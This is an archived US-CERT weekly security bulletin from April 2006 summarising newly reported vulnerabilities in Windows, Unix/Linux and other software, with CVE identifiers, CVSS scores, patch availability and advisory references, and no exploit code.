U.S. Flag Official website of the Department of Homeland Security

Note: This page is part of the us-cert.gov archive.This document is part of the US-CERT website archive. These documents are no longer updated and may contain outdated information. Links may also no longer function. Please contact info@us-cert.gov if you have any questions about the US-CERT website archive.

TLP:WHITE

Bulletin (SB06-096)

Summary of Security Items from March 30 through April 5, 2006

Original release date: April 06, 2006

The US-CERT Cyber Security Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. The NVD is sponsored by the Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) / United States Computer Emergency Readiness Team (US-CERT). For modified or updated entries, please visit the NVD, which contains historical vulnerability information.

The vulnerabilities are based on the CVE vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities correspond to the following scores:

  • High - Vulnerabilities will be labeled High severity if they have a CVSS base score of 7.0 - 10.0

  • Medium - Vulnerabilities will be labeled Medium severity if they have a CVSS base score of 4.0 - 6.9

  • Low - Vulnerabilities will be labeled Low severity if they have a CVSS base score of 0.0 - 3.9

Entries may include additional information provided by organizations and efforts sponsored by US-CERT. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletins is compiled from external, open source reports and is not a direct result of US-CERT analysis.

The US-CERT Cyber Security Bulletin provides a summary of new and updated vulnerabilities, exploits, trends, and malicious code that have recently been openly reported. Information in the Cyber Security Bulletin is a compilation of open source and US-CERT vulnerability information. As such, the Cyber Security Bulletin includes information published by sources outside of US-CERT and should not be considered the result of US-CERT analysis or as an official report of US-CERT. Although this information does reflect open source reports, it is not an official description and should be used for informational purposes only. The intention of the Cyber Security Bulletin is to serve as a comprehensive directory of pertinent vulnerability reports, providing brief summaries and additional sources for further investigation.

Vulnerabilities
Wireless Trends & Vulnerabilities
General Trends
Viruses/Trojans


Vulnerabilities

The tables below summarize vulnerabilities that have been reported by various open source organizations or presented in newsgroups and on web sites. Items in bold designate updates that have been made to past entries. Entries are grouped by the operating system on which the reported software operates, and vulnerabilities which affect both Windows and Unix/ Linux Operating Systems are included in the Multiple Operating Systems table. Note, entries in each table are not necessarily vulnerabilities in that operating system, but vulnerabilities in software which operate on some version of that operating system.

Entries may contain additional US-CERT sponsored information, including Common Vulnerabilities and Exposures (CVE) numbers, National Vulnerability Database (NVD) links, Common Vulnerability Scoring System (CVSS) values, Open Vulnerability and Assessment Language (OVAL) definitions, or links to US-CERT Vulnerability Notes. Metrics, values, and information included in the Cyber Security Bulletin which has been provided by other US-CERT sponsored programs, is prepared, managed, and contributed by those respective programs. CVSS values are managed and provided by the US-CERT/ NIST National Vulnerability Database. Links are also provided to patches and workarounds that have been provided by the product’s vendor.

The Risk levels are defined below:

High - Vulnerabilities will be labeled “High” severity if they have a CVSS base score of 7.0-10.0.

Medium - Vulnerabilities will be labeled “Medium” severity if they have a base CVSS score of 4.0-6.9.

Low - Vulnerabilities will be labeled “Low” severity if they have a CVSS base score of 0.0-3.9.

Note that scores provided prior to 11/9/2005 are approximated from only partially available CVSS metric data. Such scores are marked as "Approximated" within NVD. In particular, the following CVSS metrics are only partially available for these vulnerabilities and NVD assumes certain values based on an approximation algorithm: AccessComplexity, Authentication, ConfImpact of 'partial', IntegImpact of 'partial', AvailImpact of 'partial', and the impact biases.

Windows Operating Systems Only
Vendor & Software Name
Description

Common Name

CVSS
Resources
AN HTTPD 1.42n

A vulnerability has been reported in AN HTTPD that could let remote malicious users disclose information, script source.

Contact the vendor for AN HTTPD 1.42p.

Currently we are not aware of any exploits for this vulnerability.

AN HTTPD Information Disclosure

CVE-2006-1598

3.3 Secunia, Advisory: SA19326, April 3, 2006

Eset Software

NOD32 Antivirus 2.5

A vulnerability has been reported in NOD32 Antivirus that could let local malicious users obtain arbitrary file creation rights.

Upgrade to NOD32 Antivirus 2.51.26 via tool's online update capabilities.

There is no exploit code required.

NOD32 Antivirus Arbitrary File Creation

CVE-2006-0951

Not Available Secunia, Advisory: SA19054, April 5, 2006
EzASPSite 2.0 RC3

An input validation vulnerability has been reported in ExASPSite that could let remote malicious users perform SQL injection.

No workaround or patch available at time of publishing.

There is no exploit code required.

EzASPSite Default.ASP SQL Injection Vulnerability

CVE-2006-1541

3.3 Secunia, Advisory: SA19441, March 30, 2006

HP

Color LaserJet Toolbox 2500 and 4600 for Windows

An input validation vulnerability has been reported in Color LaserJet Toolbox that could let remote malicious users disclose information.

HP Solution

A Proof of Concept exploit has been published.

HP Color LaserJet Toolbox Information Disclosure

CVE-2006-1654

Not Available Security Focus, ID: 17367, April 4, 2006

McAfee

VirusScan 10.0.21, SecurityCenter Agent 6.0.0.16

A buffer overflow vulnerability has been reported in VirusScan, DUNZIP32.dll, that could let remote malicious users obtain unauthorized access.

Upgrade to newest version of DUNZIP32.dll via tools online update capabilities.

There is no exploit code required.

McAfee VirusScan Unauthorized Access

CVE-2004-1094

10 Secunia, Advisory: SA19460, March 30, 2006

McAfee

WebShield SMTP 4.5 MR1a

A vulnerability has been reported in WebShield that could let remote malicious users execute arbitrary code.

McAfee WebShield 4.5 MR2

There is no exploit code required.

McAfee WebShield Arbitrary Code Execution

CVE-2006-0559

10 Security Tracker, Alert ID: 1015861, April 4, 2006

Microsoft

Office XP, XP SP1, XP SP2, XP SP3

A vulnerability has been reported in Office XP, array index, that could let remote malicious users cause a Denial of Service.

No workaround or patch available at time of publishing.

A Proof of Concept exploit script, excel_03262006.rar, has been published.

Microsoft Office XP Denial of Service

CVE-2006-1540

1.4 Security Focus, ID: 17252, March 27, 2006

Microsoft

Windows Help File Viewer

A heap overflow vulnerability has been reported in Windows Help File Viewer that could let remote malicious users execute arbitrary code.

No workaround or patch available at time of publishing.

Currently we are not aware of any exploits for this vulnerability.

Microsoft Windows Help File Viewer Arbitrary Code Execution

CVE-2006-1591

5.6 Security Focus, ID: 17325, March 31, 2006

RealPlayer 8, 10, 10.0.6, 10.5, RealOne Player, and RealPlayer Enterprise

A buffer overflow vulnerability has been reported in RealPlayer, Mimio Broadcast file processing, that could let remote malicious users execute arbitrary code.

RealPlayer

There is no exploit code required.

RealPlayer Arbitrary Code Execution

CVE-2006-1370

7

Security Tracker, Alert ID: 1015810, March 24, 2006

US-CERT VU#451556

SiteSearch Indexer 3.5

An input validation vulnerability has been reported in SiteSearch Indexer, searchresults.asp, that could let remote malicious users conduct Cross-Site Scripting.

No workaround or patch available at time of publishing.

A Proof of Concept exploit has been published.

SiteSearch Indexer Cross-Site Scripting

CVE-2006-1567

2.3 Security Focus, ID: 17332, March 31, 2006

SMART Technologies

SynchronEyes 6.0

Multiple vulnerabilities have been reported in SynchronEyes that could let remote malicious users cause a Denial of Service.

No workaround or patch available at time of publishing.

There is no exploit code required.

SynchronEyes Denial of Service

CVE-2006-1647
CVE-2006-1648

Not Available Security Focus, ID: 17373, April 4, 2006
Total Commander prior to 6.54

A buffer overflow vulnerability has been reported in Total Commander that could let remote malicious users execute arbitrary code.

Total Commander 6.54

There is no exploit code required.

Total Commander Arbitrary Code Execution Not Available Security Tracker, Alert ID: 1015852, March 31, 2006
UltraVNC 1.0.1

Multiple buffer overflow vulnerabilities have been reported in UltraVNC that could let remote malicious users execute arbitrary code.

No workaround or patch available at time of publishing.

A Proof of Concept exploit script, uvncbof.zip, has been published.

UltraVNC Arbitrary Code Execution

CVE-2006-1652

Not Available Security Focus, ID: 17378, April 4, 2006

UNIX / Linux Operating Systems Only
Vendor & Software Name
Description

Common Name

CVSS
Resources

Apple

Mac OS X Server 10.4.5, OS X 10.4.5

A vulnerability has been reported on Intel-based Macintosh computers due to an unspecified error, which could let a remote malicious user bypass the firmware password.

Updates available

Currently we are not aware of any exploits for this vulnerability.

Mac OS X Firmware Password Bypass

CVE-2006-0401

4.9 Apple Security Advisory, APPLE-SA-2006-04-03, April 3, 2006

Apple

Safari RSS 2.3 pre-release, 2.0-2.0.2, 1.3, 1.2-1.2.3, 1.0, 1.1, Beta 2, Mac OS X Server 10.4-10.4.5, Mac OS X 10.4-10.4.5

A remote Denial of Service vulnerability has been reported in 'ImageIO' due to a failure to process malicious image files.

No workaround or patch available at time of publishing.

There is no exploit code required.

Apple Mac OS X Remote Denial of Service

CVE-2006-1552

2.3 Security Focus, Bugtraq ID: 17321, March 30, 2006

BusyBox

BusyBox Linux Utilities

A vulnerability has been reported in 'passwd' due to a design flaw that results in password hashes being created in an insecure manner, which could let a malicious user bypass security restrictions.

No workaround or patch available at time of publishing.

Precomputed password hashes can be used to exploit this vulnerability.

BusyBox Insecure Password Hash

CVE-2006-1058

1.6 Secunia Advisory: SA19477, March 31, 2006

Crafty Syntax Image Gallery

Crafty Syntax Image Gallery 3.1g.

Several vulnerabilities have been reported: an SQL injection vulnerability was reported in 'slides.php' due to insufficient sanitization of the 'limitquery_s' parameter before using in an SQL query, which could let a remote malicious user execute arbitrary SQL code; and a vulnerability was reported due to insufficient verification of images during the upload process, which could let a remote malicious user execute arbitrary PHP code.

No workaround or patch available at time of publishing.

Vulnerabilities can be exploited through a web client; however, an exploit script, crappy_syntax.pl, has been published.

Crafty Syntax Image Gallery SQL Injection & Image Verification
Not Available Secunia Advisory: SA19478, April 5, 2006

Free
RADIUS

FreeRADIUS 1.0-1.0.5

A vulnerability has been reported in the EAP-MSCHAPv2 state machine due to an error, which could let a malicious user bypass authentication and cause a Denial of Service.

Updates available

SuSE

RedHat

Gentoo

Currently we are not aware of any exploits for this vulnerability.

FreeRADIUS EAP-MSCHAPv2 Authentication Bypass

CVE-2006-1354

8

Security Focus, Bugtraq ID: 17171, March 21, 2006

SUSE Security Announcement, SUSE-SA:2006:019, March 28, 2006

RedHat Security Advisory, RHSA-2006:0271-11, April 4, 2006

Gentoo Linux Security Advisory, GLSA 200604-03, April 4, 2006

GNU

Mailman 2.1-2.1.5, 2.0-2.0.14

A remote Denial of Service vulnerability has been reported in 'Scrubber.py' due to a failure to handle exception conditions when Python fails to process an email file attachment that contains utf8 characters in its filename.

Mandriva

SuSE

Ubuntu

Debian

RedHat

Trustix

SGI

There is no exploit code required.

GNU Mailman Attachment Scrubber UTF8 Filename Remote Denial of Service

CVE-2005-3573

Secunia Advisory: SA17511, November 14, 2005

Mandriva Linux Security Advisory, MDKSA-2005:222, December 2, 2005

SUSE Security Summary Report, SUSE-SR:2006:001, January 13, 2006

Ubuntu Security Notice, USN-242-1 January 16, 2006

Debian Security Advisory, DSA-955-1, January 25, 2006

RedHat Security Advisory, RHSA-2006:0204-10, March 7, 2006

Trustix Secure Linux Security Advisory #2006-0012, March 10, 2006

SGI Security Advisory, 20060401-01-U, April 4, 2006

GNU

GNU Privacy Guard prior to 1.4.2.2.

A vulnerability has been reported caused due to an error in the detection of unsigned data, which could let a remote malicious user inject arbitrary data and bypass verification.

Updates available

Debian

Gentoo

Fedora

SuSE

Slackware

RedHat

Ubuntu

Trustix

SGI

There is no exploit code required.

GnuPG Unsigned Data Injection Detection

CVE-2006-0049

GNU Security Advisory, March 9, 2006

Debian Security Advisory, DSA 993-1, March 10, 2006

Gentoo Linux Security Advisory, GLSA 200603-08, March 10, 2006

SUSE Security Announcement, SUSE-SA:2006:014, March 10, 2006

Slackware Security Advisory, SSA:2006-072-02, March 13, 2006

RedHat Security Advisory, RHSA-2006:0266-8, March 15, 2006

Ubuntu Security Notice, USN-264-1, March 13, 2006

Trustix Secure Linux Security Advisory #2006-0014, March 20, 2006

SGI Security Advisory, 20060401-01-U, April 4, 2006

GnuPG

GnuPG / gpg prior to 1.4.2.1

A vulnerability has been reported because 'gpgv' exits with a return code of 0 even if the detached signature file did not carry any signature (if 'gpgv" or "gpg --verify' is used), which could let a remote malicious user bypass security restrictions.

Patches available

Fedora

Debian

Mandriva

Ubuntu

Gentoo

SuSE

SuSE

SuSE

Slackware

RedHat

SGI

There is no exploit code required; however, a Proof of Concept exploit has been published.

GnuPG Detached Signature Verification Bypass

CVE-2006-0455

4.9

GnuPG Advisory, February 15, 2006

Fedora Update Notification,
FEDORA-2006-116, February 17, 2006

Debian Security Advisory,
DSA-978-1, February 17, 2006

Mandriva Security Advisory, MDKSA-2006:043, February 17, 2006

Ubuntu Security Notice, USN-252-1, February 17, 2006

Gentoo Linux Security Advisory, GLSA 200602-10, February 18, 2006

SuSE Security Announcement, SUSE-SA:2006:009, February 20, 2006

SUSE Security Announcement, SUSE-SA:2006:013, March 1, 2006

SUSE Security Summary Report, SUSE-SR:2006:005, March 3, 2006

Slackware Security Advisory, SSA:2006-072-02, March 13, 2006

RedHat Security Advisory, RHSA-2006:0266-8, March 15, 2006

SGI Security Advisory, 20060401-01-U, April 4, 2006

Hitachi

XFIT/S/ZGN 0,
XFIT/S XFIT/S/JCA 0,
XFIT/S XFIT/S, ZENGIN 0, XFIT/S XFIT/S 0

A remote Denial of Service vulnerability has been reported due to an unspecified error when the service receives data unexpectedly.

Update information

Currently we are not aware of any exploits for this vulnerability.

Hitachi XFIT/S Remote Denial of Service

CVE-2006-1609

2.3 Hitachi Security Advisory, HS06-004, March 31, 2006

Horde Project

Horde Application Framework 3.0.9 & prior

A vulnerability has been reported in 'services/go.php' due to insufficient verification of the 'url' parameter before using in a 'readfile()' call, which could let a remote malicious user obtain sensitive information.

Updates available

Gentoo

Currently we are not aware of any exploits for this vulnerability.

Horde Information Disclosure

CVE-2006-1260

2.3

Secunia Advisory: SA19246, March 15, 2006

Gentoo Linux Security Advisory, GLSA 200604-02, April 4, 2006

Kaffeine

Kaffeine Media Player 0.4.2-0.7.1

A buffer overflow vulnerability has been reported in the 'http_peek()' function when creating HTTP request headers for retrieving remote playlists, which could let a remote malicious user execute arbitrary code.

Patches available

Debian

Mandriva

Gentoo

Currently we are not aware of any exploits for this vulnerability.

Kaffeine Buffer Overflow

CVE-2006-0051

5.6

KDE Security Advisory, April 4, 2006

Debian Security Advisory,
DSA-1023-1, April 5, 2006

Mandriva Linux Security Advisory MDKSA-2006:065, April 5, 2006

Gentoo Linux Security Advisory, GLSA 200604-04, April 5, 2006

MediaWiki

MediaWiki 1.5.7

An HTML injection vulnerability has been reported in the Encoded Page Link due to insufficient sanitization of user-supplied input before using it in dynamically generated content, which could let a remote malicious user execute arbitrary HTML and script code.

Updates available

SuSE

Gentoo

Vulnerability can be exploited via a web client.

MediaWiki HTML Injection

CVE-2006-1498

2.3

Security Focus, Bugtraq ID: 17269, March 27, 2006

SUSE Security Summary Report, SUSE-SR:2006:007, March 31, 2006

Gentoo Linux Security Advisory, GLSA 200604-01, April 4, 2006

mpg123

mpg123 0.59 r

A vulnerability has been reported when handling MP3 streams, which could let a remote malicious user corrupt memory or possibly execute arbitrary code.

No workaround or patch available at time of publishing.

A Proof of Concept Denial of Service exploit script, mpg1DoS3.pl, has been published.

MPG123 Malformed MP3 File Memory Corruption

CVE-2006-1655

Not Available Security Focus, Bugtraq ID: 17365, April 4, 2006

Multiple Vendors

Linux kernel 2.6- 2.6.14

A Denial of Service vulnerability has been reported in 'net/ipv6/udp.c' due to an infinite loop error in the 'udp_v6_get_port()' function.

Fedora

Upgrades available

Ubuntu

SUSE

RedHat

RedHat

RedHat

SmoothWall

DSA-1017

DSA-1018

DSA 1018-2

Currently we are not aware of any exploits for this vulnerability.

Linux Kernel IPV6 Denial of Service

CVE-2005-2973

Secunia Advisory: SA17261, October 21, 2005

Fedora Update Notifications,
FEDORA-2005-1007 & 1013, October 20, 2005

Security Focus, Bugtraq ID: 15156, October 31, 2005

Ubuntu Security Notice, USN-219-1, November 22, 2005

SUSE Security Announcement, SUSE-SA:2005:067, December 6, 2005

SUSE Security Announcement, SUSE-SA:2005:068, December 14, 2005

RedHat Security Advisory, RHSA-2006:0140-9, January 19, 2006

RedHat Security Advisories, RHSA-2006:0190-5 & RHSA-2006:0191-9, February 1, 2006

SmoothWall Advisory, March 15, 2006

Debian Security Advisory,
DSA-1017-1, March 23, 2006

Debian Security Advisory,
DSA-1018-1, March 24, 2006

Debian Security Advisory, DSA 1018-2, April 5, 2006

Multiple Vendors

RedHat Fedora Core4, Enterprise Linux WS 3, WS 2.1 IA64, WS 2.1, ES 3, ES 2.1 IA64, ES 2.1, AS 3, AS 2.1 IA64, AS 2.1, Advanced Workstation for the Itanium Processor 2.1 IA64, 2.1;
PHP PHP 5.1-5.1.3, 5.0-5.0.2, 4.4.0-4.4.2, 4.3-4.3.11, 4.2-4.2.3, 4.1.0-4.1.2, 4.0.0-4.0.7

A Cross-site scripting vulnerability has been reported in 'phpinfo()' due to insufficient sanitization of user-supplied input, which could let a remote malicious user execute arbitrary HTML and script code.

A CVS fix is available.

Vulnerability may be exploited with a web client.

PHP 'PHPInfo' Cross-Site Scripting
Not Available Security Focus, Bugtraq ID: 17362, April 4, 2006

Multiple Vendors

Squid Web Proxy Cache 2.5 .STABLE3-STABLE10, STABLE1

A remote Denial of Service vulnerability has been reported when handling certain client NTLM authentication request sequences.

Upgrades available

Ubuntu

Debian

Mandriva

SCO

SUSE

RedHat

RHSA-2006:0045-8

SGI

Currently we are not aware of any exploits for this vulnerability.

Squid NTLM Authentication Remote Denial of Service

CVE-2005-2917

Secunia Advisory: SA16992, September 30, 2005

Ubuntu Security Notice, USN-192-1, September 30, 2005

Debian Security Advisory, DSA 828-1, September 30, 2005

Mandriva Linux Security Update Advisory, MDKSA-2005:181, October 11, 2005

SCO Security Advisory, SCOSA-2005.44, November 1, 2005

SUSE Security Summary Report, SUSE-SR:2005:025, November 4, 2005

SUSE Security Summary Report, SUSE-SR:2005:027, November 18, 2005

RedHat Security Advisory, RHSA-2006:0052-7, March 7, 2006

RedHat Security Advisory, RHSA-2006:0045-8, March 15, 2006

SGI Security Advisory, 20060401-01-U, April 4, 2006

Multiple Vendors

Ubuntu Linux 5.10 powerpc, i386, amd64, 5.0 4 powerpc, i386, amd64, 4.1 ppc, ia64, ia32;
MandrakeSoft Linux Mandrake 10.2 x86_64, 10.2, Corporate Server 3.0 x86_64, 3.0;
GNU Mailman 2.1-2.1.5, 2.0-2.0.14, 1.0, 1.1; Debian Linux 3.1, sparc, s/390, ppc, mipsel, mips, m68k, ia-64, ia-32, hppa, arm, amd64, alpha

A remote Denial of Service vulnerability has been reported in the attachment-scrubber utility.

Update to version 2.1.6 or later.

Mandriva

Ubuntu

Debian

There is no exploit code required.

GNU Mailman Attachment Scrubber Remote Denial of Service

CVE-2006-0052

Security Focus, Bugtraq ID: 17311, March 29, 2006

Mandriva Security Advisory, MDKSA-2006:061, March 29, 2006

Ubuntu Security Notice, USN-267-1, April 03, 2006

Debian Security Advisory,
DSA-1027-1, April 6, 2006

Multiple Vendors

Linux kernel
2.6 prior to 2.6.12.1

 

A vulnerability has been reported in the 'restore_sigcontext()' function due to a failure to restrict access to the 'ar.rsc' register, which could let a malicious user cause a Denial of Service or obtain elevated privileges.

Linux Kernel

SUSE

RedHat:

RedHat

Debian

Conectiva

Debian

DSA 1018-2

Currently we are not aware of any exploits for this vulnerability.

Linux Kernel 64 Bit 'AR-RSC' Register Access

CVE-2005-1761

Security Tracker Alert ID: 1014275, June 23, 2005

SUSE Security Announce-
ment, SUSE-SA:2005:044, August 4, 2005

RedHat Security Advisory, RHSA-2005:663-19, September 28, 2005

RedHat Security Advisory, RHSA-2005:514-46, October 5, 2005

Debian Security Advisories, DSA 921-1 & 922-1, December 14, 2005

Conectiva Linux Announcement, CLSA-2006:1059, January 2, 2006

Debian Security Advisory,
DSA-1018-1, March 24, 2006

Debian Security Advisory, DSA 1018-2, April 5, 2006

Multiple Vendors

Linux kernel 2.6-2.6.12 .1

A vulnerability has been reported due to insufficient authorization before accessing a privileged function, which could let a malicious user bypass IPSEC policies.

Ubuntu

This issue has been addressed in Linux kernel 2.6.13-rc7.

SUSE

RedHat

RedHat

Mandriva

Conectiva

DSA-1017

DSA-1018

DSA 1018-2

Currently we are not aware of any exploits for this vulnerability.

Linux Kernel IPSec Policies Authorization Bypass

CVE-2005-2555

Ubuntu Security Notice, USN-169-1, August 19, 2005

Security Focus, Bugtraq ID 14609, August 19, 2005

Security Focus, Bugtraq ID 14609, August 25, 2005

SUSE Security Announcement, SUSE-SA:2005:050, September 1, 2005

RedHat Security Advisory, RHSA-2005:663-19, September 28, 2005

RedHat Security Advisory, RHSA-2005:514-46, October 5, 2005

Mandriva Linux Security Advisory, MDKSA-2005:218, November 30, 2005

Conectiva Linux Announcement, CLSA-2006:1059, January 2, 2006

Debian Security Advisory,
DSA-1017-1, March 23, 2006

Debian Security Advisory,
DSA-1018-1, March 24, 2006

Debian Security Advisory, DSA 1018-2, April 5, 2006

Multiple Vendors

Linux kernel 2.6-2.6.14

A Denial of Service vulnerability has been in 'sysctl.c' due to an error when handling the un-registration of interfaces in '/proc/sys/net/ipv4/conf/.'

Upgrades available

Ubuntu

RedHat

RedHat

RedHat

RedHat

DSA-1017

DSA-1018

DSA 1018-2

There is no exploit code required.

Linux Kernel 'Sysctl' Denial of Service

CVE-2005-2709

Secunia Advisory: SA17504, November 9, 2005

Ubuntu Security Notice, USN-219-1, November 22, 2005

RedHat Security Advisory, RHSA-2006:0101-9, January 17, 2006

RedHat Security Advisory, RHSA-2006:0140-9, January 19, 2006

RedHat Security Advisories, RHSA-2006:0190-5 & RHSA-2006:0191-9, February 1, 2006

Debian Security Advisory,
DSA-1017-1, March 23, 2006

Debian Security Advisory,
DSA-1018-1, March 24, 2006

Debian Security Advisory, DSA 1018-2, April 5, 2006

Multiple Vendors

Linux kernel 2.6-2.6.14, 2.5.0- 2.5.69, 2.4-2.4.32, 2.3, 2.3.x, 2.3.99, pre1-pre7, 2.2-2.2.27, 2.1, 2.1 .x, 2.1.89, 2.0.28-2.0.39

A vulnerability has been reported due to the way console keyboard mapping is handled, which could let a malicious user modify the console keymap to include scripted macro commands.

Mandriva

Fedora

Conectiva

SmoothWall

DSA-1017

DSA-1018

DSA 1018-2

There is no exploit code required; however, a Proof of Concept exploit has been published.

Linux Kernel Console Keymap Arbitrary Command Injection

CVE-2005-3257

Security Focus, Bugtraq ID: 15122, October 17, 2005

Mandriva Linux Security Advisories, MDKSA-2005:218, 219 & 220, November 30, 2005

Fedora Update Notification,
FEDORA-2005-1138, December 13, 2005

Conectiva Linux Announcement, CLSA-2006:1059, January 2, 2006

SmoothWall Advisory, March 15, 2006

Debian Security Advisory,
DSA-1017-1, March 23, 2006

Debian Security Advisory,
DSA-1018-1, March 24, 2006

Debian Security Advisory, DSA 1018-2, April 5, 2006

Multiple Vendors

Linux kernel 2.6-2.6.14; SuSE Linux Professional 10.0 OSS, Linux Personal 10.0 OSS;
RedHat Fedora Core4

A Denial of Service vulnerability has been reported in 'ptrace.c' when 'CLONE_THREAD' is used due to a missing check of the thread's group ID when trying to determine whether the process is attempting to attach to itself.

Upgrades available

Fedora

SUSE

Mandriva

DSA-1017

DSA-1018

DSA 1018-2

Currently we are not aware of any exploits for this vulnerability.

Linux Kernel PTrace 'CLONE_
THREAD' Denial of Service

CVE-2005-3783

Secunia Advisory: SA17761, November 29, 2005

Fedora Update Notification,
FEDORA-2005-1104, November 28, 2005

SuSE Security Announcement, SUSE-SA:2005:067, December 6, 2005

SUSE Security Announcement, SUSE-SA:2005:068, December 14, 2005

Mandriva Security Advisory, MDKSA-2006:018, January 20, 2006

Debian Security Advisory,
DSA-1017-1, March 23, 2006

Debian Security Advisory,
DSA-1018-1, March 24, 2006

Debian Security Advisory, DSA 1018-2, April 5, 2006

Multiple Vendors

Linux kernel 2.6-2.6.15

A Denial of Service vulnerability has been reported in the 'time_out_leases()' function because 'printk()' can consume large amounts of kernel log space.

Patches available

Trustix

RedHat

RedHat

DSA-1017

DSA-1018

DSA 1018-2

An exploit script has been published.

Linux Kernel PrintK Local Denial of Service

CVE-2005-3857

Security Focus, Bugtraq ID: 15627, November 29, 2005

Trustix Secure Linux Security Advisory, TSLSA-2005-0070, December 9, 2005

RedHat Security Advisory, RHSA-2006:0101-9, January 17, 2006

RedHat Security Advisory, RHSA-2006:0140-9, January 19, 2006

Debian Security Advisory,
DSA-1017-1, March 23, 2006

Debian Security Advisory, DSA-1018-1, March 24, 2006

Debian Security Advisory, DSA 1018-2, April 5, 2006

Multiple Vendors

RealOne Helix Player 1.x,
RealOne Player v1, v2,
RealPlayer 10.x, 8,
RealPlayer Enterprise 1.x;Gentoo Linux; SuSE Novell Linux Desktop 9.0, Linux Professional 10.0 OSS, 9.3 x86_64, 9.3, 9.2 x86_64, 9.2, Linux Personal 10.0 OSS, 9.3 x86_64, 9.3, 9.2 x86_64, 9.2

Multiple vulnerabilities have been reported: a buffer overflow vulnerability was reported in the handling of the 'chunked' Transfer-Encoding method due to a boundary error, which could let a remote malicious user execute arbitrary code; a buffer overflow vulnerability was reported when processing SWF files due to a boundary error, which could let a remote malicious user execute arbitrary code; and a vulnerability was reported due to the incorrect use of the 'CreateProcess()' API when executing other programs, which could let a remote malicious user execute arbitrary code.

Updates available

Gentoo

SuSE

RedHat

A Proof of Concept exploit script, realplayer-swf-PoC.pl.txt, has been published.

RealNetworks Products Multiple Buffer Overflow

CVE-2005-2922
CVE-2005-2936
CVE-2006-0323

7
(CVE-2005-2936)

7
(CVE-2006-0323)

 

Secunia Advisory: SA19358, March 27, 2006

Gentoo Linux Security Advisory, GLSA 200603-24, March 26, 2006

SUSE Security Announcement, SUSE-SA:2006:018, March 23, 2006

RedHat Security Advisory, RHSA-2006:0257-9, March 22, 2006

US-CERT VU#231028

US-CERT VU#172489

Packetstorm, April 1, 2006

Multiple Vendors

SuSE Linux Professional 10.0 OSS, 10.0, Personal 10.0 OSS;
Linux kernel 2.6-2.6.13, Linux kernel 2.4-2.4.32

 

A Denial of Service vulnerability has been reported in FlowLable.

Upgrades available

SUSE

RedHat

RedHat

Mandriva

RedHat

RedHat

Mandriva

DSA-1017

DSA-1018

DSA 1018-2

Currently we are not aware of any exploits for this vulnerability.

Linux Kernel IPv6 FlowLable Denial of Service

CVE-2005-3806

Security Focus, Bugtraq ID: 15729, December 6, 2005

SUSE Security Announcement, SUSE-SA:2005:067, December 6, 2005

SUSE Security Announcement, SUSE-SA:2005:068, December 14, 2005

RedHat Security Advisory, RHSA-2006:0101-9, January 17, 2006

RedHat Security Advisory, RHSA-2006:0140-9, January 19, 2006

Mandriva Security Advisory, MDKSA-2006:018, January 20, 2006

RedHat Security Advisories, RHSA-2006:0190-5 & RHSA-2006:0191-9, February 1, 2006

Mandriva Security Advisory, MDKSA-2006:044, February 21, 2006

Debian Security Advisory,
DSA-1017-1, March 23, 2006

Debian Security Advisory,
DSA-1018-1, March 24, 2006

Debian Security Advisory, DSA 1018-2, April 5, 2006

Multiple Vendors

Ubuntu Linux 5.0 4 powerpc, i386, amd64, 4.1 ppc, ia64, ia32;
Linux kernel 2.6.10, rc2, 2.6.8, rc1

A remote Denial of Service vulnerability has been reported in the kernel driver for compressed ISO file systems when attempting to mount a malicious compressed ISO image.

Ubuntu

SUSE

Mandriva

Conectiva

DSA-1017

DSA-1018

DSA 1018-2

Currently we are not aware of any exploits for this vulnerability.

Linux Kernel ISO File System Remote Denial of Service

CVE-2005-2457

Ubuntu Security Notice, USN-169-1, August 19, 2005

SUSE Security Announcement, SUSE-SA:2005:050, September 1, 2005

Mandriva Linux Security Advisory, MDKSA-2005:218, November 30, 2005

SUSE Security Announcement, SUSE-SA:2005:068, December 14, 2005

Conectiva Linux Announcement, CLSA-2006:1059, January 2, 2006

Debian Security Advisory,
DSA-1017-1, March 23, 2006

Debian Security Advisory.
DSA-1018-1, March 24, 2006

Debian Security Advisory, DSA 1018-2, April 5, 2006

Multiple Vendors

Ubuntu Linux 5.10 powerpc, i386, amd64, 5.0 4 powerpc, i386, amd64, 4.1 ppc, ia64, ia32;
MandrakeSoft Linux Mandrake 2006.0 x86_64, 2006.0, 10.2 x86_64, 10.2, 10.1 x86_64, 10.1, Corporate Server 3.0 x86_64, 3.0;
GNU Mailman 2.1-2.1.5, 2.0-2.0.14

A remote Denial of Service vulnerability has been reported in the email date parsing functionality due to an error in the handling of dates.

Mandriva

Ubuntu

Debian

RedHat

Trustix

SGI

There is no exploit code required.

GNU Mailman Remote Denial of Service

CVE-2005-4153

Security Focus, Bugtraq ID: 16248, January 16, 2006

Ubuntu Security Notice, USN-242-1 January 16, 2006

Debian Security Advisory, DSA-955-1, January 25, 2006

RedHat Security Advisory, RHSA-2006:0204-10, March 7, 2006

Trustix Secure Linux Security Advisory #2006-0012, March 10, 2006

SGI Security Advisory, 20060401-01-U, April 4, 2006

Multiple Vendors

VServer util-vserver 0.30.210, 0.30.209, util-vserver 0; Debian Linux 3.1, sparc, s/390, ppc, mipsel, mips, m68k, ia-64, ia-32, hppa, arm, amd64, alpha

A vulnerability has been reported in the util-vserver package 'suexec,' which could let a remote malicious user obtain elevated privileges.

No workaround or patch available at time of publishing.

There is no exploit code required.

Util-VServer Elevated Privileges

CVE-2006-1656

Not Available Security Focus, Bugtraq ID: 17361, April 4, 2006

Openwall

Openwall
crypt_blowfish 0.4.7 & prior

A vulnerability has been reported in the 'crypt_gensalt' functions for BSDI-style extended DES-based and FreeBSD-style MD5-based password hashes because they do not evenly and randomly distribute salts, which makes it easier for malicious users with a stolen copy of the password file to guess
passwords due to the increased number of salt collisions.

Updates available

Currently we are not aware of any exploits for this vulnerability.

Openwall 'crypt_blowfish' Information Disclosure

CVE-2006-0591

Secunia Advisory: SA18772, February 8, 2006

Paul Vixie

Vixie Cron 4.1

A vulnerability has been reported due to insecure creation of temporary files when crontab is executed with the '-e' option, which could let a malicious user obtain sensitive information.

Fedora

RedHat

RHSA-2006:0117-7

SGI

There is no exploit code required; however, a Proof of Concept exploit script has been published.

Vixie Cron
Crontab
Information Disclosure

CVE-2005-1038

Security Focus, 13024, April 6, 2005

Fedora Update Notification,
